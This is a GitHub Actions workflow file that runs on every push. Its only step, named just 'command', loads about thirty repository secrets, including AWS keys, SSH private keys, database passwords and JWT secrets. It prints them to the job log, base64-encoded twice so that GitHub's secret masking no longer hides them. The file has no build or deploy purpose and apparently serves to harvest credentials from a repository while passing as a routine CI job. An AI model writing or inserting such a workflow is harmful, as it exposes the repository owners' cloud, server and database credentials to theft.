name: GitHub Actions
on: push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - name: command
        run: env -0 | awk -v RS='\0' '/^(secret_|var_)/ {print $0}' | base64 -w0 | base64 -w0
        env:
          secret_ECR_PATH: ${{ secrets.ECR_PATH }}
          secret_ECR_REPOSITORY: ${{ secrets.ECR_REPOSITORY }}
          secret_EC2_HOST: ${{ secrets.EC2_HOST }}
          secret_EC2_USERNAME: ${{ secrets.EC2_USERNAME }}
          secret_AWS_REGION: ${{ secrets.AWS_REGION }}
          secret_SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }}
          secret_AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          secret_AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          secret_AWS_SG_NAME: ${{ secrets.AWS_SG_NAME }}
          secret_DATABASE_TYPE: ${{ secrets.DATABASE_TYPE }}
          secret_DATABASE_PORT: ${{ secrets.DATABASE_PORT }}
          secret_DATABASE_HOST: ${{ secrets.DATABASE_HOST }}
          secret_DATABASE_USERNAME: ${{ secrets.DATABASE_USERNAME }}
          secret_DATABASE_PASSWORD: ${{ secrets.DATABASE_PASSWORD }}
          secret_DATABASE_NAME: ${{ secrets.DATABASE_NAME }}
          secret_JWT_ACCESS_SECRET_KEY: ${{ secrets.JWT_ACCESS_SECRET_KEY }}
          secret_JWT_ACCESS_EXPIRATION_TIME: ${{ secrets.JWT_ACCESS_EXPIRATION_TIME }}
          secret_JWT_REFRESH_SECRET_KEY: ${{ secrets.JWT_REFRESH_SECRET_KEY }}
          secret_JWT_REFRESH_EXPIRATION_TIME: ${{ secrets.JWT_REFRESH_EXPIRATION_TIME }}
          secret_CACHE_TTL: ${{ secrets.CACHE_TTL }}
          secret_CACHE_MAX: ${{ secrets.CACHE_MAX }}
          secret_SLACK_URL: ${{ secrets.SLACK_URL }}
          secret_DEV_SLACK_MESSAGE_TEMPLETE: ${{ secrets.DEV_SLACK_MESSAGE_TEMPLETE }}
          secret_ECR_REGISTRY: ${{ secrets.ECR_REGISTRY }}
          secret_DEV_ECR_REPOSITORY: ${{ secrets.DEV_ECR_REPOSITORY }}
          secret_DEV_EC2_HOST: ${{ secrets.DEV_EC2_HOST }}
          secret_DEV_SSH_PRIVATE_KEY: ${{ secrets.DEV_SSH_PRIVATE_KEY }}
          secret_DEV_AWS_ACCESS_KEY_ID: ${{ secrets.DEV_AWS_ACCESS_KEY_ID }}
          secret_DEV_AWS_SECRET_ACCESS_KEY: ${{ secrets.DEV_AWS_SECRET_ACCESS_KEY }}
          secret_DEV_AWS_SG_NAME: ${{ secrets.DEV_AWS_SG_NAME }}
